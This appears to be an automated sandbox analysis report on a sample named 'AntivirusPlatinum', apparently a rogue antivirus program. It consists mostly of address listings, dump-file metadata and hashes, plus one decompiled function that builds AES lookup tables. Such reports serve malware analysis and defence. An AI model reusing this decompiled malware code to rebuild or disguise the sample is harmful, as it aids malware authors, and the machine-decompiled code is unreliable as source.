                                                                                                                                                      0x004082f8
                                                                                                                                                      0x004082f8
                                                                                                                                                      0x004082f8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004082c0
                                                                                                                                                      0x00407e30
                                                                                                                                                      0x004081e2
                                                                                                                                                      0x004081e5
                                                                                                                                                      0x004081e8
                                                                                                                                                      0x004081ed
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004081f3
                                                                                                                                                      0x004081f6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004081ff
                                                                                                                                                      0x00408202
                                                                                                                                                      0x00408205
                                                                                                                                                      0x00408207
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408211
                                                                                                                                                      0x00408211
                                                                                                                                                      0x00408212
                                                                                                                                                      0x00408215
                                                                                                                                                      0x0040821e
                                                                                                                                                      0x0040821e
                                                                                                                                                      0x00408221
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408223
                                                                                                                                                      0x00408229
                                                                                                                                                      0x0040822b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040822d
                                                                                                                                                      0x0040822d
                                                                                                                                                      0x0040822d
                                                                                                                                                      0x00408236
                                                                                                                                                      0x00408239
                                                                                                                                                      0x0040823a
                                                                                                                                                      0x00408240
                                                                                                                                                      0x00408242
                                                                                                                                                      0x00408245
                                                                                                                                                      0x00408247
                                                                                                                                                      0x0040824b
                                                                                                                                                      0x00408254
                                                                                                                                                      0x00408259
                                                                                                                                                      0x0040825c
                                                                                                                                                      0x00408270
                                                                                                                                                      0x0040827b
                                                                                                                                                      0x0040827b
                                                                                                                                                      0x0040825c
                                                                                                                                                      0x00408280
                                                                                                                                                      0x00408283
                                                                                                                                                      0x00408286
                                                                                                                                                      0x00408286
                                                                                                                                                      0x0040828b
                                                                                                                                                      0x0040828b
                                                                                                                                                      0x0040828f
                                                                                                                                                      0x00408290
                                                                                                                                                      0x00408290
                                                                                                                                                      0x00408290
                                                                                                                                                      0x00408290
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408295
                                                                                                                                                      0x00407e39
                                                                                                                                                      0x004080c7
                                                                                                                                                      0x004080cd
                                                                                                                                                      0x004080d0
                                                                                                                                                      0x004080d3
                                                                                                                                                      0x004080d6
                                                                                                                                                      0x004080d9
                                                                                                                                                      0x004080dc
                                                                                                                                                      0x004080df
                                                                                                                                                      0x004080e2
                                                                                                                                                      0x004080e5
                                                                                                                                                      0x004080eb
                                                                                                                                                      0x004080f0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004080f6
                                                                                                                                                      0x004080f8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004080fe
                                                                                                                                                      0x004080fe
                                                                                                                                                      0x004080fe
                                                                                                                                                      0x00408104
                                                                                                                                                      0x00408107
                                                                                                                                                      0x00408107
                                                                                                                                                      0x0040810a
                                                                                                                                                      0x0040810e
                                                                                                                                                      0x00408111
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408117
                                                                                                                                                      0x0040811d
                                                                                                                                                      0x00408120
                                                                                                                                                      0x00408127
                                                                                                                                                      0x0040812a
                                                                                                                                                      0x0040812a
                                                                                                                                                      0x0040812b
                                                                                                                                                      0x0040812e
                                                                                                                                                      0x0040812e
                                                                                                                                                      0x00408132
                                                                                                                                                      0x0040818a
                                                                                                                                                      0x0040818a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040818a
                                                                                                                                                      0x00408134
                                                                                                                                                      0x00408137
                                                                                                                                                      0x0040813b
                                                                                                                                                      0x00408143
                                                                                                                                                      0x00408151
                                                                                                                                                      0x00408162
                                                                                                                                                      0x00408166
                                                                                                                                                      0x0040816e
                                                                                                                                                      0x00408171
                                                                                                                                                      0x00408174
                                                                                                                                                      0x0040817b
                                                                                                                                                      0x0040817b
                                                                                                                                                      0x0040817e
                                                                                                                                                      0x00408185
                                                                                                                                                      0x00408180
                                                                                                                                                      0x00408180
                                                                                                                                                      0x00408180
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040817e
                                                                                                                                                      0x00408176
                                                                                                                                                      0x00408179
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040818d
                                                                                                                                                      0x00408195
                                                                                                                                                      0x00408198
                                                                                                                                                      0x0040819c
                                                                                                                                                      0x0040819f
                                                                                                                                                      0x004081a2
                                                                                                                                                      0x004081a5
                                                                                                                                                      0x004081a5
                                                                                                                                                      0x004081a5
                                                                                                                                                      0x004081a8
                                                                                                                                                      0x004081a8
                                                                                                                                                      0x004081ad
                                                                                                                                                      0x004081ad
                                                                                                                                                      0x004081b0
                                                                                                                                                      0x004081b3
                                                                                                                                                      0x004081b3
                                                                                                                                                      0x004081c0
                                                                                                                                                      0x004081c3
                                                                                                                                                      0x004081d6
                                                                                                                                                      0x004081d6
                                                                                                                                                      0x004081d8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004081c8
                                                                                                                                                      0x004081cc
                                                                                                                                                      0x004081cf
                                                                                                                                                      0x004081d3
                                                                                                                                                      0x004081d3
                                                                                                                                                      0x004081d3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004081da
                                                                                                                                                      0x00407e42
                                                                                                                                                      0x00407f01
                                                                                                                                                      0x00407f04
                                                                                                                                                      0x00407f07
                                                                                                                                                      0x00407f0a
                                                                                                                                                      0x00407f0d
                                                                                                                                                      0x00407f10
                                                                                                                                                      0x00407f13
                                                                                                                                                      0x00407f16
                                                                                                                                                      0x00407f19
                                                                                                                                                      0x00407f1f
                                                                                                                                                      0x00407f25
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407f2b
                                                                                                                                                      0x00407f2d
                                                                                                                                                      0x00407f2f
                                                                                                                                                      0x00407f32
                                                                                                                                                      0x00407f38
                                                                                                                                                      0x004080aa
                                                                                                                                                      0x004080aa
                                                                                                                                                      0x004080aa
                                                                                                                                                      0x004080ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407f6b
                                                                                                                                                      0x00407f76
                                                                                                                                                      0x00407f78
                                                                                                                                                      0x00407f80
                                                                                                                                                      0x00407f91
                                                                                                                                                      0x00407f96
                                                                                                                                                      0x00407f99
                                                                                                                                                      0x00407fa5
                                                                                                                                                      0x00407fad
                                                                                                                                                      0x00407fb2
                                                                                                                                                      0x00407fbd
                                                                                                                                                      0x00407fc0
                                                                                                                                                      0x00407fc4
                                                                                                                                                      0x00407fc7
                                                                                                                                                      0x00407fcf
                                                                                                                                                      0x00407fdd
                                                                                                                                                      0x00407feb
                                                                                                                                                      0x00407ff8
                                                                                                                                                      0x00408004
                                                                                                                                                      0x00408011
                                                                                                                                                      0x0040801c
                                                                                                                                                      0x0040801f
                                                                                                                                                      0x00408022
                                                                                                                                                      0x00408026
                                                                                                                                                      0x0040809e
                                                                                                                                                      0x004080a1
                                                                                                                                                      0x004080a4
                                                                                                                                                      0x004080a7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408028
                                                                                                                                                      0x00408028
                                                                                                                                                      0x0040802b
                                                                                                                                                      0x0040802f
                                                                                                                                                      0x00408032
                                                                                                                                                      0x00408032
                                                                                                                                                      0x00408032
                                                                                                                                                      0x00408041
                                                                                                                                                      0x00408041
                                                                                                                                                      0x00408044
                                                                                                                                                      0x00408045
                                                                                                                                                      0x00408048
                                                                                                                                                      0x00408033
                                                                                                                                                      0x00408033
                                                                                                                                                      0x00408037
                                                                                                                                                      0x00408039
                                                                                                                                                      0x0040803b
                                                                                                                                                      0x0040803d
                                                                                                                                                      0x0040803f
                                                                                                                                                      0x0040803f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040804a
                                                                                                                                                      0x0040804c
                                                                                                                                                      0x0040804c
                                                                                                                                                      0x0040804d
                                                                                                                                                      0x00408095
                                                                                                                                                      0x00408099
                                                                                                                                                      0x0040809b
                                                                                                                                                      0x0040809b
                                                                                                                                                      0x0040809b
                                                                                                                                                      0x0040809b
                                                                                                                                                      0x0040804f
                                                                                                                                                      0x0040804f
                                                                                                                                                      0x0040804f
                                                                                                                                                      0x00408050
                                                                                                                                                      0x0040808a
                                                                                                                                                      0x0040808e
                                                                                                                                                      0x00408090
                                                                                                                                                      0x00408090
                                                                                                                                                      0x00408052
                                                                                                                                                      0x00408052
                                                                                                                                                      0x00408052
                                                                                                                                                      0x00408053
                                                                                                                                                      0x0040807f
                                                                                                                                                      0x00408083
                                                                                                                                                      0x00408085
                                                                                                                                                      0x00408085
                                                                                                                                                      0x00408055
                                                                                                                                                      0x00408055
                                                                                                                                                      0x00408055
                                                                                                                                                      0x00408056
                                                                                                                                                      0x00408074
                                                                                                                                                      0x00408078
                                                                                                                                                      0x0040807a
                                                                                                                                                      0x0040807a
                                                                                                                                                      0x00408058
                                                                                                                                                      0x00408058
                                                                                                                                                      0x00408058
                                                                                                                                                      0x00408059
                                                                                                                                                      0x00408069
                                                                                                                                                      0x0040806d
                                                                                                                                                      0x0040806f
                                                                                                                                                      0x0040806f
                                                                                                                                                      0x0040805b
                                                                                                                                                      0x0040805b
                                                                                                                                                      0x0040805c
                                                                                                                                                      0x0040805e
                                                                                                                                                      0x00408062
                                                                                                                                                      0x00408064
                                                                                                                                                      0x00408064
                                                                                                                                                      0x00408062
                                                                                                                                                      0x0040805c
                                                                                                                                                      0x00408059
                                                                                                                                                      0x00408056
                                                                                                                                                      0x00408053
                                                                                                                                                      0x00408050
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040804d
                                                                                                                                                      0x00408048
                                                                                                                                                      0x00408026
                                                                                                                                                      0x004080b3
                                                                                                                                                      0x004080b6
                                                                                                                                                      0x004080b9
                                                                                                                                                      0x004080bc
                                                                                                                                                      0x00407f3a
                                                                                                                                                      0x00407f3d
                                                                                                                                                      0x00407f3d
                                                                                                                                                      0x00407f3f
                                                                                                                                                      0x00407f46
                                                                                                                                                      0x00407f49
                                                                                                                                                      0x00407f4c
                                                                                                                                                      0x00407f4f
                                                                                                                                                      0x00407f52
                                                                                                                                                      0x00407f55
                                                                                                                                                      0x00407f58
                                                                                                                                                      0x00407f5d
                                                                                                                                                      0x00407f60
                                                                                                                                                      0x00407f64
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407f64
                                                                                                                                                      0x004080c2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407f32
                                                                                                                                                      0x00407e4b
                                                                                                                                                      0x00407ea6
                                                                                                                                                      0x00407ea9
                                                                                                                                                      0x00407eaf
                                                                                                                                                      0x00407eb1
                                                                                                                                                      0x00407eb4
                                                                                                                                                      0x00407eb7
                                                                                                                                                      0x00407ebd
                                                                                                                                                      0x00407ec3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407ec9
                                                                                                                                                      0x00407ecc
                                                                                                                                                      0x00407ece
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407ed4
                                                                                                                                                      0x00407ed4
                                                                                                                                                      0x00407ed7
                                                                                                                                                      0x00407ed9
                                                                                                                                                      0x00407eed
                                                                                                                                                      0x00407eed
                                                                                                                                                      0x00407eef
                                                                                                                                                      0x00407edd
                                                                                                                                                      0x00407ee0
                                                                                                                                                      0x00407ee3
                                                                                                                                                      0x00407ee4
                                                                                                                                                      0x00407ee7
                                                                                                                                                      0x00407ee7
                                                                                                                                                      0x00407eea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407eea
                                                                                                                                                      0x00407ef1
                                                                                                                                                      0x00407ef4
                                                                                                                                                      0x00407ef7
                                                                                                                                                      0x00407ef7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407ed4
                                                                                                                                                      0x00407e50
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407e56
                                                                                                                                                      0x00407e59
                                                                                                                                                      0x00407e5b
                                                                                                                                                      0x00407e63
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407e6b
                                                                                                                                                      0x00407e8d
                                                                                                                                                      0x00407e92
                                                                                                                                                      0x00407e98
                                                                                                                                                      0x00407e9b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407e6d
                                                                                                                                                      0x00407e6d
                                                                                                                                                      0x00407e6d
                                                                                                                                                      0x00407e70
                                                                                                                                                      0x00407e73
                                                                                                                                                      0x00407e77
                                                                                                                                                      0x00407e79
                                                                                                                                                      0x00407e7c
                                                                                                                                                      0x00407e80
                                                                                                                                                      0x00407e82
                                                                                                                                                      0x00407e82
                                                                                                                                                      0x00407e80
                                                                                                                                                      0x00407e85
                                                                                                                                                      0x00407e88
                                                                                                                                                      0x00407e89
                                                                                                                                                      0x00000000

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 793eb8acfe7b56b9e0e2ffda27fff7268e03f0766cdb39e56d671b486faabcc2
                                                                                                                                                      • Instruction ID: a767dd345aae43465a873efd591c8ff9a8f9b96ad8d492f56da380bf2bc35be0
                                                                                                                                                      • Opcode Fuzzy Hash: 793eb8acfe7b56b9e0e2ffda27fff7268e03f0766cdb39e56d671b486faabcc2
                                                                                                                                                      • Instruction Fuzzy Hash: 00F18E31D006099FCB14CFA9C5845AEBBB1FF49314F24857FD996B7282DB38A941CB89
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                      			E00409DE0() {
                                                                                                                                                      				signed char _v8;
                                                                                                                                                      				char _v521;
                                                                                                                                                      				signed int _t98;
                                                                                                                                                      				signed int _t100;
                                                                                                                                                      				signed int _t102;
                                                                                                                                                      				signed char _t105;
                                                                                                                                                      				signed char _t106;
                                                                                                                                                      				char _t107;
                                                                                                                                                      				void* _t108;
                                                                                                                                                      				signed char _t119;
                                                                                                                                                      				signed int _t120;
                                                                                                                                                      				signed int _t129;
                                                                                                                                                      				signed char* _t155;
                                                                                                                                                      				signed int _t156;
                                                                                                                                                      				signed int _t161;
                                                                                                                                                      				signed int _t162;
                                                                                                                                                      				signed int _t163;
                                                                                                                                                      				signed int _t164;
                                                                                                                                                      				signed int _t181;
                                                                                                                                                      				signed int _t182;
                                                                                                                                                      				void* _t183;
                                                                                                                                                      
                                                                                                                                                      				_t107 = 0;
                                                                                                                                                      				_t98 = 1;
                                                                                                                                                      				do {
                                                                                                                                                      					 *(_t183 + _t107 - 0x304) = _t98;
                                                                                                                                                      					 *(_t183 + _t107 - 0x205) = _t98;
                                                                                                                                                      					 *((char*)(_t183 + _t98 - 0x104)) = _t107;
                                                                                                                                                      					_t107 = _t107 + 1;
                                                                                                                                                      					asm("sbb edx, edx");
                                                                                                                                                      					_t98 = _t98 ^  ~(_t98 & 0x00000080) & 0x0000011b ^ _t98 + _t98;
                                                                                                                                                      				} while (_t98 != 1);
                                                                                                                                                      				_t108 = 0;
                                                                                                                                                      				do {
                                                                                                                                                      					asm("sbb edx, edx");
                                                                                                                                                      					 *(_t108 + 0x418ca8) = _t98;
                                                                                                                                                      					_t98 = _t98 + _t98 ^  ~(_t98 & 0x00000080) & 0x0000011b;
                                                                                                                                                      					_t108 = _t108 + 1;
                                                                                                                                                      				} while (_t108 < 0x1e);
                                                                                                                                                      				_t105 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				L6:
                                                                                                                                                      				L6:
                                                                                                                                                      				if(_t105 == 0) {
                                                                                                                                                      					_t100 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t100 =  *( &_v521 - ( *(_t183 + (_t105 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
                                                                                                                                                      				}
                                                                                                                                                      				_t119 = (_t100 ^ (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) + (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100)) >> 0x00000008 ^ _t100 ^ (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) + (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) ^ 0x00000063;
                                                                                                                                                      				_t102 = _t105 * 4;
                                                                                                                                                      				_t16 = _t102 + 0x417ca8; // 0x417ca8
                                                                                                                                                      				_t155 = _t16;
                                                                                                                                                      				 *(_t105 + 0x418dc8) = _t119;
                                                                                                                                                      				_t155[1] = _t119;
                                                                                                                                                      				 *_t155 = _t119;
                                                                                                                                                      				 *(_t102 + 0x4180ab) = _t119;
                                                                                                                                                      				 *(_t102 + 0x4180a8) = _t119;
                                                                                                                                                      				 *(_t102 + 0x4184ab) = _t119;
                                                                                                                                                      				 *(_t102 + 0x4184aa) = _t119;
                                                                                                                                                      				 *(_t102 + 0x4188aa) = _t119;
                                                                                                                                                      				 *(_t102 + 0x4188a9) = _t119;
                                                                                                                                                      				if(_t119 == 0) {
                                                                                                                                                      					_t156 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t156 =  *(_t183 + ( *(_t183 + (_t119 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t102 + 0x417cab) = _t156;
                                                                                                                                                      				 *(_t102 + 0x4180aa) = _t156;
                                                                                                                                                      				 *(_t102 + 0x4184a9) = _t156;
                                                                                                                                                      				 *(_t102 + 0x4188a8) = _t156;
                                                                                                                                                      				if(_t119 == 0) {
                                                                                                                                                      					_t120 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t120 =  *(_t183 + ( *(_t183 + (_t119 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t102 + 0x417caa) = _t120;
                                                                                                                                                      				 *(_t102 + 0x4180a9) = _t120;
                                                                                                                                                      				 *(_t102 + 0x4184a8) = _t120;
                                                                                                                                                      				 *(_t102 + 0x4188ab) = _t120;
                                                                                                                                                      				_t181 = _t105 & 0x000000ff;
                                                                                                                                                      				if((((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) >> 0x00000008 ^ ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) ^ 0x00000005) == 0) {
                                                                                                                                                      					_t106 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t106 =  *((intOrPtr*)( &_v521 - ( *(_t183 + (((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) >> 0x00000008 & 0x000000ff ^ ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
                                                                                                                                                      				}
                                                                                                                                                      				 *(_v8 + 0x418cc8) = _t106;
                                                                                                                                                      				if(_t106 == 0) {
                                                                                                                                                      					_t161 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t161 =  *(_t183 + ( *(_t183 + (_t106 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
                                                                                                                                                      				}
                                                                                                                                                      				_t182 = _t106 & 0x000000ff;
                                                                                                                                                      				_t129 = _t182 << 2;
                                                                                                                                                      				 *(_t102 + 0x416caa) = _t161;
                                                                                                                                                      				 *(_t102 + 0x4170a9) = _t161;
                                                                                                                                                      				 *(_t102 + 0x4174a8) = _t161;
                                                                                                                                                      				 *(_t102 + 0x4178ab) = _t161;
                                                                                                                                                      				 *(_t129 + 0x415caa) = _t161;
                                                                                                                                                      				 *(_t129 + 0x4160a9) = _t161;
                                                                                                                                                      				 *(_t129 + 0x4164a8) = _t161;
                                                                                                                                                      				 *(_t129 + 0x4168ab) = _t161;
                                                                                                                                                      				if(_t106 == 0) {
                                                                                                                                                      					_t162 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t162 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t102 + 0x416ca8) = _t162;
                                                                                                                                                      				 *(_t102 + 0x4170ab) = _t162;
                                                                                                                                                      				 *(_t102 + 0x4174aa) = _t162;
                                                                                                                                                      				 *(_t102 + 0x4178a9) = _t162;
                                                                                                                                                      				 *(_t129 + 0x415ca8) = _t162;
                                                                                                                                                      				 *(_t129 + 0x4160ab) = _t162;
                                                                                                                                                      				 *(_t129 + 0x4164aa) = _t162;
                                                                                                                                                      				 *(_t129 + 0x4168a9) = _t162;
                                                                                                                                                      				if(_t106 == 0) {
                                                                                                                                                      					_t163 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t163 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t102 + 0x416ca9) = _t163;
                                                                                                                                                      				 *(_t102 + 0x4170a8) = _t163;
                                                                                                                                                      				 *(_t102 + 0x4174ab) = _t163;
                                                                                                                                                      				 *(_t102 + 0x4178aa) = _t163;
                                                                                                                                                      				 *(_t129 + 0x415ca9) = _t163;
                                                                                                                                                      				 *(_t129 + 0x4160a8) = _t163;
                                                                                                                                                      				 *(_t129 + 0x4164ab) = _t163;
                                                                                                                                                      				 *(_t129 + 0x4168aa) = _t163;
                                                                                                                                                      				if(_t106 == 0) {
                                                                                                                                                      					_t164 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t164 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
                                                                                                                                                      				}
                                                                                                                                                      				_v8 = _v8 + 1;
                                                                                                                                                      				 *(_t102 + 0x416cab) = _t164;
                                                                                                                                                      				 *(_t102 + 0x4170aa) = _t164;
                                                                                                                                                      				 *(_t102 + 0x4174a9) = _t164;
                                                                                                                                                      				 *(_t102 + 0x4178a8) = _t164;
                                                                                                                                                      				 *(_t129 + 0x415cab) = _t164;
                                                                                                                                                      				 *(_t129 + 0x4160aa) = _t164;
                                                                                                                                                      				 *(_t129 + 0x4164a9) = _t164;
                                                                                                                                                      				 *(_t129 + 0x4168a8) = _t164;
                                                                                                                                                      				if(_v8 < 0x100) {
                                                                                                                                                      					goto L5;
                                                                                                                                                      				}
                                                                                                                                                      				return _t102;
                                                                                                                                                      				L5:
                                                                                                                                                      				_t105 = _v8;
                                                                                                                                                      				goto L6;
                                                                                                                                                      			}
























                                                                                                                                                      0x00409ded
                                                                                                                                                      0x00409def
                                                                                                                                                      0x00409df6
                                                                                                                                                      0x00409dfe
                                                                                                                                                      0x00409e05
                                                                                                                                                      0x00409e0c
                                                                                                                                                      0x00409e13
                                                                                                                                                      0x00409e16
                                                                                                                                                      0x00409e1f
                                                                                                                                                      0x00409e21
                                                                                                                                                      0x00409e26
                                                                                                                                                      0x00409e29
                                                                                                                                                      0x00409e33
                                                                                                                                                      0x00409e35
                                                                                                                                                      0x00409e3f
                                                                                                                                                      0x00409e41
                                                                                                                                                      0x00409e42
                                                                                                                                                      0x00409e47
                                                                                                                                                      0x00409e49
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409e51
                                                                                                                                                      0x00409e53
                                                                                                                                                      0x00409e6d
                                                                                                                                                      0x00409e55
                                                                                                                                                      0x00409e68
                                                                                                                                                      0x00409e68
                                                                                                                                                      0x00409e87
                                                                                                                                                      0x00409e8a
                                                                                                                                                      0x00409e91
                                                                                                                                                      0x00409e91
                                                                                                                                                      0x00409e97
                                                                                                                                                      0x00409e9d
                                                                                                                                                      0x00409ea0
                                                                                                                                                      0x00409ea2
                                                                                                                                                      0x00409ea8
                                                                                                                                                      0x00409eae
                                                                                                                                                      0x00409eb4
                                                                                                                                                      0x00409eba
                                                                                                                                                      0x00409ec0
                                                                                                                                                      0x00409ec6
                                                                                                                                                      0x00409edd
                                                                                                                                                      0x00409ec8
                                                                                                                                                      0x00409ed3
                                                                                                                                                      0x00409ed3
                                                                                                                                                      0x00409edf
                                                                                                                                                      0x00409ee5
                                                                                                                                                      0x00409eeb
                                                                                                                                                      0x00409ef1
                                                                                                                                                      0x00409ef9
                                                                                                                                                      0x00409f10
                                                                                                                                                      0x00409efb
                                                                                                                                                      0x00409f06
                                                                                                                                                      0x00409f06
                                                                                                                                                      0x00409f12
                                                                                                                                                      0x00409f18
                                                                                                                                                      0x00409f1e
                                                                                                                                                      0x00409f24
                                                                                                                                                      0x00409f2a
                                                                                                                                                      0x00409f45
                                                                                                                                                      0x00409f79
                                                                                                                                                      0x00409f47
                                                                                                                                                      0x00409f75
                                                                                                                                                      0x00409f75
                                                                                                                                                      0x00409f7e
                                                                                                                                                      0x00409f86
                                                                                                                                                      0x00409f9d
                                                                                                                                                      0x00409f88
                                                                                                                                                      0x00409f93
                                                                                                                                                      0x00409f93
                                                                                                                                                      0x00409f9f
                                                                                                                                                      0x00409fa4
                                                                                                                                                      0x00409fa7
                                                                                                                                                      0x00409fad
                                                                                                                                                      0x00409fb3
                                                                                                                                                      0x00409fb9
                                                                                                                                                      0x00409fbf
                                                                                                                                                      0x00409fc5
                                                                                                                                                      0x00409fcb
                                                                                                                                                      0x00409fd1
                                                                                                                                                      0x00409fd9
                                                                                                                                                      0x00409fed
                                                                                                                                                      0x00409fdb
                                                                                                                                                      0x00409fe3
                                                                                                                                                      0x00409fe3
                                                                                                                                                      0x00409fef
                                                                                                                                                      0x00409ff5
                                                                                                                                                      0x00409ffb
                                                                                                                                                      0x0040a001
                                                                                                                                                      0x0040a007
                                                                                                                                                      0x0040a00d
                                                                                                                                                      0x0040a013
                                                                                                                                                      0x0040a019
                                                                                                                                                      0x0040a021
                                                                                                                                                      0x0040a035
                                                                                                                                                      0x0040a023
                                                                                                                                                      0x0040a02b
                                                                                                                                                      0x0040a02b
                                                                                                                                                      0x0040a037
                                                                                                                                                      0x0040a03d
                                                                                                                                                      0x0040a043
                                                                                                                                                      0x0040a049
                                                                                                                                                      0x0040a04f
                                                                                                                                                      0x0040a055
                                                                                                                                                      0x0040a05b
                                                                                                                                                      0x0040a061
                                                                                                                                                      0x0040a069
                                                                                                                                                      0x0040a07d
                                                                                                                                                      0x0040a06b
                                                                                                                                                      0x0040a073
                                                                                                                                                      0x0040a073
                                                                                                                                                      0x0040a07f
                                                                                                                                                      0x0040a089
                                                                                                                                                      0x0040a08f
                                                                                                                                                      0x0040a095
                                                                                                                                                      0x0040a09b
                                                                                                                                                      0x0040a0a1
                                                                                                                                                      0x0040a0a7
                                                                                                                                                      0x0040a0ad
                                                                                                                                                      0x0040a0b3
                                                                                                                                                      0x0040a0b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a0c2
                                                                                                                                                      0x00409e4e
                                                                                                                                                      0x00409e4e
                                                                                                                                                      0x00000000

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
